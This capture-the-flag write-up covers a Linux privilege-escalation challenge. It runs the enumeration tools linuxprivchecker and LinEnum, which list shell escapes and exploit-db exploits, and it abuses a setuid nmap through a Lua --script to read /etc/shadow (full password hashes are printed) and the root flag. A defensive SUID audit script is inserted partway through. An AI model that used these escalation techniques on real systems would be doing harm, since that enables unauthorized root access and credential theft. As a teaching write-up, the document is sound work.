CSA CTF 2019 Writeup - Linux 2
Question
ssh user@35.231.176.102 -p1774
Password: utsacyber
Solution
user@7ab7e9c7f6a4:~$ ll
total 32
drwxr-xr-x 1 user user 4096 Apr 27 14:35 ./
drwxr-xr-x 1 root root 4096 Apr 22 20:12 ../
-rw-r--r-- 1 user user  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user user 3771 Aug 31  2015 .bashrc
drwx------ 2 user user 4096 Apr 27 14:35 .cache/
-rw-r--r-- 1 user user  655 May 16  2017 .profile
-rw-rw-r-- 1 root root   10 Apr 22 20:56 readme.txt
user@7ab7e9c7f6a4:~$ cat readme.txt
Get root.
This looks like a privilege escalation challenge.
Let's run linuxprivchecker and LinEnum to look for a foothold.
linuxprivchecker
user@7ab7e9c7f6a4:~$ cd /tmp/
user@7ab7e9c7f6a4:/tmp$ wget https://www.securitysift.com/download/linuxprivchecker.py
--2019-04-27 14:39:10--  https://www.securitysift.com/download/linuxprivchecker.py
Resolving www.securitysift.com (www.securitysift.com)... 173.254.14.183
Connecting to www.securitysift.com (www.securitysift.com)|173.254.14.183|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [application/octet-stream]
Saving to: 'linuxprivchecker.py'

linuxprivchecker.py 100%[=====================================>]  24.71K  --.-KB/s    in 0s

2019-04-27 14:39:10 (54.0 MB/s) - 'linuxprivchecker.py' saved [25304/25304]

user@7ab7e9c7f6a4:/tmp$ python linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 4.15.0-1029-gcp (buildd@lcy01-amd64-029) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Thu Mar 21 09:40:28 UTC 2019

[+] Hostname
    7ab7e9c7f6a4

[+] Operating System
    Ubuntu 16.04.6 LTS \n \l

(snip)

[+] SUID/SGID Files and Directories
    -rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /sbin/pam_extrausers_chkpwd
    -rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
    -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
    -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
    -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
    -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
    drwxrwsr-x 7 root staff 4096 Apr 22 20:12 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/entities
    drwxrwsr-x 6 root staff 4096 Apr 22 20:12 /usr/local/share/xml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/schema
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/entities
    drwxrwsr-x 3 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5/dist-packages
    drwxrwsr-x 4 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/dist-packages
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/site-packages
    -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
    -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
    -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
    -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
    -rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage
    -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
    -rwxr-sr-x 1 root tty 27368 May 16 2018 /usr/bin/wall
    -rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry
    -rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap
    -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
    -rwxr-sr-x 1 root ssh 358624 Mar 4 14:09 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 428240 Mar 4 14:09 /usr/lib/openssh/ssh-keysign
    drwxrwsr-x 2 root staff 4096 Apr 12 2016 /var/local
    drwxrwsr-x 2 root mail 4096 Feb 22 10:05 /var/mail

(snip)

[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/nmap
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget

[+] Related Shell Escape Sequences...
    nmap-->	--interactive
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    awk-->	awk 'BEGIN {system("/bin/bash")}'
    find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->	perl -e 'exec "/bin/bash";'

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system

    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Finished
=================================================================================================
LinEnum
user@7ab7e9c7f6a4:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-27 14:40:28--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: 'LinEnum.sh'

LinEnum.sh 100%[==============================================================================================>]  44.57K  --.-KB/s    in 0.02s

2019-04-27 14:40:28 (1.84 MB/s) - 'LinEnum.sh' saved [45639/45639]

user@7ab7e9c7f6a4:/tmp$ chmod 777 ./LinEnum.sh
user@7ab7e9c7f6a4:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sat Apr 27 14:41:02 UTC 2019

(snip)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1328 Apr 22 20:12 /etc/passwd
-rw-r--r-- 1 root root 602 Apr 22 20:12 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 898 Apr 22 20:12 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /usr/lib/openssh/ssh-keysign

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap

(snip)

### SCAN COMPLETE ####################################
Both tools show that nmap is installed and has the SUID bit set (owned by root, so it runs with root's file privileges).
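A root-owned SUID binary that can load arbitrary scripts or spawn a shell (nmap's --script, or the vi/find/awk/perl escapes linuxprivchecker lists above) hands root's file privileges to every local user, so the defensive counterpart of this enumeration is a baseline audit: list every setuid file and flag the ones that are not expected on the distribution. The script below is an added example and not part of the writeup or of either enumeration tool; the allowlist is an assumption constructed from the stock Ubuntu 16.04 entries in the listing above, and the sample listing is constructed from the same output so the check runs offline.

```shell
#!/bin/sh
# Added example: audit 'ls -l'-style SUID listings against an expected baseline.

# Assumed baseline: SUID binaries a stock Ubuntu 16.04 host ships with
# (constructed from the writeup's listing; build your own from a clean image).
SUID_ALLOWLIST="/bin/su
/bin/mount
/bin/umount
/bin/ping
/bin/ping6
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign"

# audit_suid: reads 'ls -l' lines on stdin and prints the path of every regular
# file whose setuid bit is set ('s' or 'S' in the owner-execute slot of the mode)
# but which is not on the allowlist. SGID-only files (chage, wall, ssh-agent) and
# SGID directories (the staff-writable /usr/local trees) are not setuid and are
# skipped; they are a separate review item.
audit_suid() {
    while read -r perms _links _owner _group _size _mon _day _time path; do
        case "$perms" in
            -??[sS]*) ;;          # regular file with the setuid bit
            *) continue ;;        # directory, or no setuid bit
        esac
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# remediation_for: for each flagged path on stdin, print the command that drops
# the setuid bit. It only prints; review each binary before applying.
remediation_for() {
    while read -r path; do
        printf 'chmod u-s %s\n' "$path"
    done
}

# Constructed sample input, copied from the linuxprivchecker output above.
SAMPLE_LISTING="-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /sbin/pam_extrausers_chkpwd
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
drwxrwsr-x 7 root staff 4096 Apr 22 20:12 /usr/local/share/sgml
-rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /usr/lib/openssh/ssh-keysign"

# audit_sample: run the audit over the constructed sample (used by the demo below).
audit_sample() {
    printf '%s\n' "$SAMPLE_LISTING" | audit_suid
}

# scan_live: the same audit over the real host; unreadable directories are ignored.
scan_live() {
    find / -type f -perm -4000 -exec ls -l {} + 2>/dev/null | audit_suid
}

echo "Unexpected SUID files in sample listing:"
audit_sample
echo "Suggested remediation:"
audit_sample | remediation_for
```

On the sample the only hit is /usr/bin/nmap, the binary the writeup goes on to use, and the printed remediation is the one-line fix for this challenge host: drop the setuid bit, since nmap needs raw-socket privileges only for some scan types and those are better granted via sudo rules or file capabilities than via SUID root.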
After searching the web for a while, I found the following article.
It looks like nmap's --script option can be used.
I tried the approach from the article, but it did not give me a shell as written. Perhaps one more trick is needed.
However, using the file-read procedure (with a small modification), I was able to read the /etc/shadow file.
user@7ab7e9c7f6a4:/tmp$ TF=$(mktemp)
user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/etc/shadow", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:43 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
root:$6$i09NKN3z$3ubpJ2G77IKDzS5KKfYjGx3p4MM7ISlhKmDD/.4oJ8Yf88CkRnJVoqdS4BMh8Vae/fQg3.Rjvcbxb4IHgmAqn0:18008:0:99999:7:::
daemon:*:17949:0:99999:7:::
bin:*:17949:0:99999:7:::
sys:*:17949:0:99999:7:::
sync:*:17949:0:99999:7:::
games:*:17949:0:99999:7:::
man:*:17949:0:99999:7:::
lp:*:17949:0:99999:7:::
mail:*:17949:0:99999:7:::
news:*:17949:0:99999:7:::
uucp:*:17949:0:99999:7:::
proxy:*:17949:0:99999:7:::
www-data:*:17949:0:99999:7:::
backup:*:17949:0:99999:7:::
list:*:17949:0:99999:7:::
irc:*:17949:0:99999:7:::
gnats:*:17949:0:99999:7:::
nobody:*:17949:0:99999:7:::
systemd-timesync:*:17949:0:99999:7:::
systemd-network:*:17949:0:99999:7:::
systemd-resolve:*:17949:0:99999:7:::
systemd-bus-proxy:*:17949:0:99999:7:::
_apt:*:17949:0:99999:7:::
sshd:*:18008:0:99999:7:::
user:$6$xReGWCgk$2OD/Q2jXewLgbryfcZZugNCic/xBt.BKkbk5dB6BcRQmNdw.yw6PC1S8N40Tm7WymaTh4K927hFGUJ9aoSm/1.:18008:0:99999:7:::

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
	[C]: in function 'error'
	/usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
	/usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
	/usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
	[C]: in ?

QUITTING!
Since the previous challenge's flag was in a flag.txt file and readme.txt says "Get root.", I guess the flag file is at /root/flag.txt.
user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/root/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:44 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
	[C]: in function 'error'
	/usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
	/usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
	/usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
	[C]: in ?

QUITTING!
Got the flag.
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}